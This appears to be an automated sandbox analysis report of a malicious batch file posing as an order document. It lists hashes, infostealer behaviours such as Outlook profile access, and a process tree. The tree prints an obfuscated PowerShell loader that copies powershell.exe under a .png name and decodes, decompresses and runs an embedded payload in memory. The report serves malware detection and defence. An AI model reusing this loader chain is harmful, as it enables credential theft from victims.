Analysis
-
max time kernel
142s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 07:49
Static task
static1
Behavioral task
behavioral1
Sample
NEW ORDER FILE.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
NEW ORDER FILE.bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
NEW ORDER FILE1.exe
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
NEW ORDER FILE1.exe
Resource
win10v2004-20230915-en
General
-
Target
NEW ORDER FILE.bat
-
Size
1.7MB
-
MD5
d6af0bfbb45c5d0b02613fb9347210c5
-
SHA1
e7192006d2bd1de89e9a18de2cda62e8b6ceb0c6
-
SHA256
9848b1d683d2014c2b8a87ffb00f8d82b781f7f76d243a997a39e7864a49468d
-
SHA512
4aa5a9da343ed676d7f2b14a76a13e26546dcde7e345d8f3e02f89f9b8631c756a0cc30eb1dd21a1515f75e16dd4065d88fba130282c88c70e3fddb80fdeab93
-
SSDEEP
24576:Xd0nFJzwsyF4bjlnttBX7cu1ms60MXNcB7ZKMzqAML2Z8XWNzQgBBCVY9yFxwCg4:kFZyAz2aZJxPt2gB0w2Slq
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1560 Esvcsqfelsa.png -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key opened \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key opened \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key opened \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key opened \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key opened \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key opened \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key opened \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1560 Esvcsqfelsa.png 1560 Esvcsqfelsa.png 1560 Esvcsqfelsa.png 1560 Esvcsqfelsa.png 1560 Esvcsqfelsa.png 1560 Esvcsqfelsa.png -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1560 Esvcsqfelsa.png Token: SeDebugPrivilege 1560 Esvcsqfelsa.png -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4104 wrote to memory of 3284 4104 cmd.exe 87 PID 4104 wrote to memory of 3284 4104 cmd.exe 87 PID 3284 wrote to memory of 1376 3284 cmd.exe 89 PID 3284 wrote to memory of 1376 3284 cmd.exe 89 PID 3284 wrote to memory of 4896 3284 cmd.exe 90 PID 3284 wrote to memory of 4896 3284 cmd.exe 90 PID 3284 wrote to memory of 632 3284 cmd.exe 92 PID 3284 wrote to memory of 632 3284 cmd.exe 92 PID 3284 wrote to memory of 5080 3284 cmd.exe 93 PID 3284 wrote to memory of 5080 3284 cmd.exe 93 PID 3284 wrote to memory of 1560 3284 cmd.exe 94 PID 3284 wrote to memory of 1560 3284 cmd.exe 94 -
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Esvcsqfelsa.png
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEW ORDER FILE.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW ORDER FILE.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:1376
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.png3⤵PID:4896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:632
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\NEW ORDER FILE.bat" C:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.png.bat3⤵PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.pngC:\Users\Admin\AppData\Local\Temp\Esvcsqfelsa.png -win 1 -enc JABVAHoAcwBzAHkAawB5AGkAZwBhAHYAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQAUQBuAGsAYgBnAGEAcwBuAHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVQB6AHMAcwB5AGsAeQBpAGcAYQB2ACkAOwAkAE8AeABhAGgAcwBtAGIAaQB4AGUAZwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAUQBuAGsAYgBnAGEAcwBuAHYAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASwBzAGYAegB3AGQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABPAHgAYQBoAHMAbQBiAGkAeABlAGcALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEsAcwBmAHoAdwBkAGIALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAEsAcwBmAHoAdwBkAGIALgBDAGwAbwBzAGUAKAApADsAJABPAHgAYQBoAHMAbQBiAGkAeABlAGcALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABRAG4AawBiAGcAYQBzAG4AdgAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABRAG4AawBiAGcAYQBzAG4AdgApADsAIAAkAFIAegBuAHcAagBuAHoAbwBlAGcAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABRAG4AawBiAGcAYQBzAG4AdgApADsAIAAkAE4AaQBtAHkAaABkAGEAcwAgAD0AIAAkAFIAegBuAHcAagBuAHoAbwBlAGcAcQAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAEkAZwBwAHEAbAB4AHIAIAA9ACAAJABOAGkAbQB5AGgAZABhAHMALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1560
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
1.7MB
MD5d6af0bfbb45c5d0b02613fb9347210c5
SHA1e7192006d2bd1de89e9a18de2cda62e8b6ceb0c6
SHA2569848b1d683d2014c2b8a87ffb00f8d82b781f7f76d243a997a39e7864a49468d
SHA5124aa5a9da343ed676d7f2b14a76a13e26546dcde7e345d8f3e02f89f9b8631c756a0cc30eb1dd21a1515f75e16dd4065d88fba130282c88c70e3fddb80fdeab93
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82